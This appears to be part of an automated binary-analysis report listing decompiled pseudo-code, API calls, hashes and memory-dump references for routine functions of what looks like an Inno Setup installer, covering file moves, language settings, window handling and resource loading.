                                                                    • Instruction ID: a0643c8b31b351ed7dd0ed5e96a0399ab73b0cd2583ebe073036f576505b33dd
                                                                    • Opcode Fuzzy Hash: 4a5734cba4f1f567cfe39a2ea32e2412489323ff365467ecfcfbb8db8d726f7e
                                                                    • Instruction Fuzzy Hash: 2D0148317407146BDB10EBB6DC82F8E77EDDB49704F514876B400F62D2DE78AE058A58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0060DAE9, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 71%
                                                                    			E0060DAE9(void* __edx) {
				WCHAR* _t13;
				intOrPtr _t32;
				intOrPtr _t33;
				void* _t36;

				SetFileAttributesW(E0040B278( *((intOrPtr*)(_t36 - 0x10))), 0x20);
				if(E00423A20( *((intOrPtr*)(_t36 - 0x10))) == 0) {
					E0060CE84(L"DeleteFile");
				}
				_t13 = E0040B278( *((intOrPtr*)(_t36 - 0x10)));
				if(MoveFileW(E0040B278( *((intOrPtr*)(_t36 - 0x14))), _t13) == 0) {
					E0060CE84(L"MoveFile");
				}
				_pop(_t32);
				 *[fs:eax] = _t32;
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(E0060DBD9);
				E0040A228(_t36 - 0x44, 7);
				return E0040A228(_t36 - 0x1c, 7);
			}







                                                                    0x0060daf4
                                                                    0x0060db03
                                                                    0x0060db0a
                                                                    0x0060db0a
                                                                    0x0060db12
                                                                    0x0060db28
                                                                    0x0060db2f
                                                                    0x0060db2f
                                                                    0x0060db36
                                                                    0x0060db39
                                                                    0x0060dbac
                                                                    0x0060dbaf
                                                                    0x0060dbb2
                                                                    0x0060dbbf
                                                                    0x0060dbd1

                                                                    APIs
                                                                    • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0060DAF4
                                                                      • Part of subcall function 00423A20: DeleteFileW.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A30
                                                                      • Part of subcall function 00423A20: GetLastError.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A3F
                                                                      • Part of subcall function 00423A20: GetFileAttributesW.KERNEL32(00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000), ref: 00423A47
                                                                      • Part of subcall function 00423A20: RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A62
                                                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 0060DB21
                                                                      • Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$AttributesErrorLast$DeleteDirectoryMoveRemove
                                                                    • String ID: DeleteFile$MoveFile
                                                                    • API String ID: 3947864702-139070271
                                                                    • Opcode ID: 28384db22342baecc380df85cc8e828356bddb25a27468d4207e88f44f6ce01a
                                                                    • Instruction ID: fe212bc12655be3e3d7d94ed230904773b29f806c55adb2c37bf9887ca86c235
                                                                    • Opcode Fuzzy Hash: 28384db22342baecc380df85cc8e828356bddb25a27468d4207e88f44f6ce01a
                                                                    • Instruction Fuzzy Hash: 62F044706841058AEB08FBF6E9069AF73A5EF44318F51467EF404E72C1DA3C9C05862D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004698FC, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 107COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 84%
                                                                    			E004698FC(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, void* _a4, signed short _a8) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _t30;
				void* _t67;
				void* _t68;
				intOrPtr _t73;
				intOrPtr _t77;
				char _t78;
				intOrPtr _t82;
				signed short _t93;
				void* _t96;
				void* _t98;
				void* _t99;
				intOrPtr _t100;

				_t78 = __edx;
				_t68 = __ecx;
				_t98 = _t99;
				_t100 = _t99 + 0xffffffdc;
				_v36 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				if(__edx != 0) {
					_t100 = _t100 + 0xfffffff0;
					_t30 = E00408A40(_t30, _t98);
				}
				_t96 = _t68;
				_v5 = _t78;
				_t67 = _t30;
				_t93 = _a8;
				_push(_t98);
				_push(0x469a4c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t100;
				if((0x0000ff00 & _t93) != 0xff00) {
					E0046976C(E004236A4(_t96, _t93 & 0x0000ffff), 0);
					if( *((intOrPtr*)(_t67 + 4)) == 0xffffffff) {
						E00423BD0(_t96,  &_v36);
						_v24 = _v36;
						_v20 = 0x11;
						E00427D54(GetLastError(), _t67, 0, _t96);
						_v16 = _v40;
						_v12 = 0x11;
						_t73 =  *0x6cd8a8; // 0x415564
						E00429100(_t67, _t73, 1, _t93, _t96, 1,  &_v24);
						E004098C4();
					}
				} else {
					_t94 = _t93 & 0x000000ff;
					if((_t93 & 0x000000ff) == 0xff) {
						_t94 = 0x10;
					}
					E0046976C(E004236FC(_t96, _t94 & 0x0000ffff), 0);
					if( *((intOrPtr*)(_t67 + 4)) == 0xffffffff) {
						E00423BD0(_t96,  &_v28);
						_v24 = _v28;
						_v20 = 0x11;
						E00427D54(GetLastError(), _t67, 0, _t96);
						_v16 = _v32;
						_v12 = 0x11;
						_t77 =  *0x6ce1a8; // 0x41555c
						E00429100(_t67, _t77, 1, _t94, _t96, 1,  &_v24);
						E004098C4();
					}
				}
				_t28 = _t67 + 8; // 0x443d54
				E0040A5A8(_t28, _t96);
				_pop(_t82);
				 *[fs:eax] = _t82;
				_push(E00469A53);
				return E0040A228( &_v40, 4);
			}
























                                                                    0x004698fc
                                                                    0x004698fc
                                                                    0x004698fd
                                                                    0x004698ff
                                                                    0x00469907
                                                                    0x0046990a
                                                                    0x0046990d
                                                                    0x00469910
                                                                    0x00469915
                                                                    0x00469917
                                                                    0x0046991a
                                                                    0x0046991a
                                                                    0x0046991f
                                                                    0x00469921
                                                                    0x00469924
                                                                    0x00469926
                                                                    0x0046992b
                                                                    0x0046992c
                                                                    0x00469931
                                                                    0x00469934
                                                                    0x00469942
                                                                    0x004699d2
                                                                    0x004699db
                                                                    0x004699e2
                                                                    0x004699ea
                                                                    0x004699ed
                                                                    0x004699fb
                                                                    0x00469a03
                                                                    0x00469a06
                                                                    0x00469a10
                                                                    0x00469a1d
                                                                    0x00469a22
                                                                    0x00469a22
                                                                    0x00469944
                                                                    0x00469944
                                                                    0x0046994e
                                                                    0x00469950
                                                                    0x00469950
                                                                    0x00469967
                                                                    0x00469970
                                                                    0x0046997b
                                                                    0x00469983
                                                                    0x00469986
                                                                    0x00469994
                                                                    0x0046999c
                                                                    0x0046999f
                                                                    0x004699a9
                                                                    0x004699b6
                                                                    0x004699bb
                                                                    0x004699bb
                                                                    0x00469970
                                                                    0x00469a27
                                                                    0x00469a2c
                                                                    0x00469a33
                                                                    0x00469a36
                                                                    0x00469a39
                                                                    0x00469a4b

                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,00469A4C,?,?,00443D4C,00000001), ref: 0046998A
                                                                      • Part of subcall function 004236A4: CreateFileW.KERNEL32(00000000,000000F0,000000F0,00000000,00000003,00000080,00000000,?,?,00443D4C,004699CC,00000000,00469A4C,?,?,00443D4C), ref: 004236F3
                                                                      • Part of subcall function 00423BD0: GetFullPathNameW.KERNEL32(00000000,00000104,?,?,?,?,?,00443D4C,004699E7,00000000,00469A4C,?,?,00443D4C,00000001), ref: 00423BF3
                                                                    • GetLastError.KERNEL32(00000000,00469A4C,?,?,00443D4C,00000001), ref: 004699F1
                                                                      • Part of subcall function 00427D54: FormatMessageW.KERNEL32(00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,00443D4C,00000000,?,00469A00,00000000,00469A4C), ref: 00427D78
                                                                      • Part of subcall function 00427D54: LocalFree.KERNEL32(00000001,00427DD1,00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,00443D4C,00000000,?,00469A00,00000000,00469A4C), ref: 00427DC4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLast$CreateFileFormatFreeFullLocalMessageNamePath
                                                                    • String ID: \UA$dUA
                                                                    • API String ID: 503893064-3864016770
                                                                    • Opcode ID: 8f6538f2233dbe51c704c46e78bae72522b5131ed1e615a9c685bbd8288b59b5
                                                                    • Instruction ID: 123e0454fb2a9dec89cd9e8203dbd653fcf04e778e7e37e714b9737e464d7bf3
                                                                    • Opcode Fuzzy Hash: 8f6538f2233dbe51c704c46e78bae72522b5131ed1e615a9c685bbd8288b59b5
                                                                    • Instruction Fuzzy Hash: 8641A370B002599FDB00EFA6C8815EEBBF5AF58314F40812AE914A7382D77D5E05CB6A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040DE74, Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 58%
                                                                    			E0040DE74(signed short __eax, void* __edx) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				short _v22;
				short _v24;
				char _v26;
				char _v32;
				void* __ebp;
				void* _t39;
				void* _t55;
				void* _t59;
				short* _t62;
				signed short _t66;
				void* _t67;
				void* _t68;
				signed short _t79;
				void* _t81;

				_t81 = __edx;
				_t66 = __eax;
				_v16 = 0;
				if(__eax !=  *0x6d1c0c()) {
					_v16 = E0040DE30( &_v8);
					_t79 = _t66;
					_v20 = 3;
					_t62 =  &_v26;
					do {
						 *_t62 =  *(0xf + "0123456789ABCDEF") & 0x000000ff;
						_t79 = (_t79 & 0x0000ffff) >> 4;
						_v20 = _v20 - 1;
						_t62 = _t62 - 2;
					} while (_v20 != 0xffffffff);
					_v24 = 0;
					_v22 = 0;
					 *0x6d1c08(4,  &_v32,  &_v20);
				}
				_t39 = E0040DE30( &_v12);
				_t67 = _t39;
				if(_t67 != 0) {
					_t55 = _v12 - 2;
					if(_t55 >= 0) {
						_t59 = _t55 + 1;
						_v20 = 0;
						do {
							if( *((short*)(_t67 + _v20 * 2)) == 0) {
								 *((short*)(_t67 + _v20 * 2)) = 0x2c;
							}
							_v20 = _v20 + 1;
							_t59 = _t59 - 1;
						} while (_t59 != 0);
					}
					E0040B2DC(_t81, _t67);
					_t39 = E00406F28(_t67);
				}
				if(_v16 != 0) {
					 *0x6d1c08(0, 0,  &_v20);
					_t68 = E0040DE30( &_v12);
					if(_v8 != _v12 || E0040DE0C(_v16, _v12, _t68) != 0) {
						 *0x6d1c08(8, _v16,  &_v20);
					}
					E00406F28(_t68);
					return E00406F28(_v16);
				}
				return _t39;
			}





















                                                                    0x0040de7c
                                                                    0x0040de7e
                                                                    0x0040de82
                                                                    0x0040de8e
                                                                    0x0040de98
                                                                    0x0040de9b
                                                                    0x0040de9d
                                                                    0x0040dea4
                                                                    0x0040dea7
                                                                    0x0040deb8
                                                                    0x0040debe
                                                                    0x0040dec1
                                                                    0x0040dec4
                                                                    0x0040dec7
                                                                    0x0040decd
                                                                    0x0040ded3
                                                                    0x0040dee3
                                                                    0x0040dee3
                                                                    0x0040deec
                                                                    0x0040def1
                                                                    0x0040def5
                                                                    0x0040defa
                                                                    0x0040deff
                                                                    0x0040df01
                                                                    0x0040df02
                                                                    0x0040df09
                                                                    0x0040df11
                                                                    0x0040df16
                                                                    0x0040df16
                                                                    0x0040df1c
                                                                    0x0040df1f
                                                                    0x0040df1f
                                                                    0x0040df09
                                                                    0x0040df26
                                                                    0x0040df2d
                                                                    0x0040df2d
                                                                    0x0040df36
                                                                    0x0040df40
                                                                    0x0040df4e
                                                                    0x0040df56
                                                                    0x0040df73
                                                                    0x0040df73
                                                                    0x0040df7b
                                                                    0x00000000
                                                                    0x0040df83
                                                                    0x0040df8d

                                                                    APIs
                                                                    • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040DE85
                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040DEE3
                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040DF40
                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040DF73
                                                                      • Part of subcall function 0040DE30: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040DEF1), ref: 0040DE47
                                                                      • Part of subcall function 0040DE30: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040DEF1), ref: 0040DE64
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Thread$LanguagesPreferred$Language
                                                                    • String ID:
                                                                    • API String ID: 2255706666-0
                                                                    • Opcode ID: 7b6831f497646e761f52de9c536b6e12a9bbcbfaf2b29159977432e5b56d760a
                                                                    • Instruction ID: 69b1dabfcf83cd92044bbbe7d095353c7cd2b80021ffbfb9d1b785f1729ac455
                                                                    • Opcode Fuzzy Hash: 7b6831f497646e761f52de9c536b6e12a9bbcbfaf2b29159977432e5b56d760a
                                                                    • Instruction Fuzzy Hash: 63317070E1021A9BCB10DFE9D884AAEB7B5FF14305F40417AE516FB2D1D7789A09CB94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005B9590, Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 93%
                                                                    			E005B9590(signed char __eax, intOrPtr _a4) {
				int _t22;
				void* _t23;
				int _t31;
				signed int _t35;
				signed char _t38;
				void* _t43;
				void* _t44;

				_t38 = __eax;
				_t2 = _a4 - 4; // 0xc31852ff
				_t22 = IsWindowVisible( *( *_t2 + 0x188));
				asm("sbb eax, eax");
				_t23 = _t22 + 1;
				_t43 = _t23 -  *0x6cccd4; // 0x0
				if(_t43 == 0) {
					_t44 = _t38 -  *0x6cccd4; // 0x0
					if(_t44 != 0) {
						_t5 = _a4 - 4; // 0xc31852ff
						if( *((char*)( *_t5 + 0xeb)) != 0 &&  *0x6cccd4 == 0) {
							_t8 = _a4 - 4; // 0xc31852ff
							_t35 = GetWindowLongW( *( *_t8 + 0x188), 0xffffffec);
							_t11 = _a4 - 4; // 0xc31852ff
							SetWindowLongW( *( *_t11 + 0x188), 0xffffffec, _t35 | 0x08000000);
						}
						_t16 = _a4 - 4; // 0xc31852ff
						_t31 = SetWindowPos( *( *_t16 + 0x188), 0, 0, 0, 0, 0,  *(0x6cccd6 + (_t38 & 0x000000ff) * 2) & 0x0000ffff);
						 *0x6cccd4 = _t38;
						return _t31;
					}
				}
				return _t23;
			}










                                                                    0x005b9594
                                                                    0x005b9599
                                                                    0x005b95a3
                                                                    0x005b95ab
                                                                    0x005b95ad
                                                                    0x005b95ae
                                                                    0x005b95b4
                                                                    0x005b95b6
                                                                    0x005b95bc
                                                                    0x005b95c1
                                                                    0x005b95cb
                                                                    0x005b95d9
                                                                    0x005b95e5
                                                                    0x005b95ed
                                                                    0x005b95ff
                                                                    0x005b95ff
                                                                    0x005b961d
                                                                    0x005b9627
                                                                    0x005b962c
                                                                    0x00000000
                                                                    0x005b962c
                                                                    0x005b95bc
                                                                    0x005b9634

                                                                    APIs
                                                                    • IsWindowVisible.USER32 ref: 005B95A3
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 005B95E5
                                                                    • SetWindowLongW.USER32 ref: 005B95FF
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,C31852FF,?,00000000,?,005B96B9,?,?,?,00000000), ref: 005B9627
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Window$Long$Visible
                                                                    • String ID:
                                                                    • API String ID: 2967648141-0
                                                                    • Opcode ID: b7a1436f9b319cac24e08ad551a1c75daf269ab9656b7f3b572d445cccf1e1b8
                                                                    • Instruction ID: de5a40ccb5800a4cef2b87037ee72a09c9fd5293aebedbf233be07227e7c069f
                                                                    • Opcode Fuzzy Hash: b7a1436f9b319cac24e08ad551a1c75daf269ab9656b7f3b572d445cccf1e1b8
                                                                    • Instruction Fuzzy Hash: B31161742851446FDB00DB28D888FFA7FE9AB45324F458191F988CB362CA38ED80CB54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0046A218, Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 80%
                                                                    			E0046A218(void* __eax, struct HINSTANCE__* __edx, WCHAR* _a8) {
				WCHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				void* _t23;
				WCHAR* _t24;
				void* _t25;
				struct HRSRC__* _t29;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t32;

				_v8 = _t24;
				_t31 = __edx;
				_t23 = __eax;
				_t29 = FindResourceW(__edx, _v8, _a8);
				 *(_t23 + 0x10) = _t29;
				if(_t29 == 0) {
					E0046A178(_t23, _t24, _t29, _t31, _t32);
					_pop(_t24);
				}
				_t5 = _t23 + 0x10; // 0x46a2b4
				_t30 = LoadResource(_t31,  *_t5);
				 *(_t23 + 0x14) = _t30;
				if(_t30 == 0) {
					E0046A178(_t23, _t24, _t30, _t31, _t32);
				}
				_t7 = _t23 + 0x10; // 0x46a2b4
				_push(SizeofResource(_t31,  *_t7));
				_t8 = _t23 + 0x14; // 0x469b00
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E00469AAC(_t23, _t25, _t18);
			}

















                                                                    0x0046a21f
                                                                    0x0046a222
                                                                    0x0046a224
                                                                    0x0046a234
                                                                    0x0046a236
                                                                    0x0046a23b
                                                                    0x0046a23e
                                                                    0x0046a243
                                                                    0x0046a243
                                                                    0x0046a244
                                                                    0x0046a24e
                                                                    0x0046a250
                                                                    0x0046a255
                                                                    0x0046a258
                                                                    0x0046a25d
                                                                    0x0046a25e
                                                                    0x0046a268
                                                                    0x0046a269
                                                                    0x0046a26d
                                                                    0x0046a276
                                                                    0x0046a281

                                                                    APIs
                                                                    • FindResourceW.KERNEL32(?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000,?,006D579C,?,?,006AC890), ref: 0046A22F
                                                                    • LoadResource.KERNEL32(?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000,?,006D579C,?), ref: 0046A249
                                                                    • SizeofResource.KERNEL32(?,0046A2B4,?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000), ref: 0046A263
                                                                    • LockResource.KERNEL32(00469B00,00000000,?,0046A2B4,?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000), ref: 0046A26D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                    • String ID:
                                                                    • API String ID: 3473537107-0
                                                                    • Opcode ID: c0a3742649e4821bf1d8e39dd4131d6b260b263a11f53cd498264533ba18d33a
                                                                    • Instruction ID: abb9b97bb193dfeb05d9d82a7f41705a61c143c3b7d9841fcbe573c2d8062a85
                                                                    • Opcode Fuzzy Hash: c0a3742649e4821bf1d8e39dd4131d6b260b263a11f53cd498264533ba18d33a
                                                                    • Instruction Fuzzy Hash: C4F081B36406046F5745EE9DA881DAB77ECEE89364310015FF908D7302EA39DD51477A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0050E958, Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 87%
                                                                    			E0050E958(struct HWND__* __eax, void* __ecx) {
				intOrPtr _t5;
				struct HWND__* _t12;
				void* _t15;
				DWORD* _t16;

				_t13 = __ecx;
				_push(__ecx);
				_t12 = __eax;
				_t15 = 0;
				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t16) != 0 && GetCurrentProcessId() ==  *_t16) {
					_t5 =  *0x6d5648; // 0x0
					if(GlobalFindAtomW(E0040B278(_t5)) !=  *0x6d5642) {
						_t15 = E0050E924(_t12, _t13);
					} else {
						_t15 = GetPropW(_t12,  *0x6d5642 & 0x0000ffff);
					}
				}
				return _t15;
			}







                                                                    0x0050e958
                                                                    0x0050e95a
                                                                    0x0050e95b
                                                                    0x0050e95d
                                                                    0x0050e961
                                                                    0x0050e978
                                                                    0x0050e98f
                                                                    0x0050e9aa
                                                                    0x0050e991
                                                                    0x0050e99f
                                                                    0x0050e99f
                                                                    0x0050e98f
                                                                    0x0050e9b1

                                                                    APIs
                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 0050E965
                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00000000,005BA39A,?,?,00000000,00000001,005B8697,?,00000000,00000000,00000000,00000000), ref: 0050E96E
                                                                    • GlobalFindAtomW.KERNEL32(00000000), ref: 0050E983
                                                                    • GetPropW.USER32 ref: 0050E99A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                    • String ID:
                                                                    • API String ID: 2582817389-0
                                                                    • Opcode ID: 96014bfda2539c3c724341726d25520330f77261c7fcf234c4c7e102e9717c52
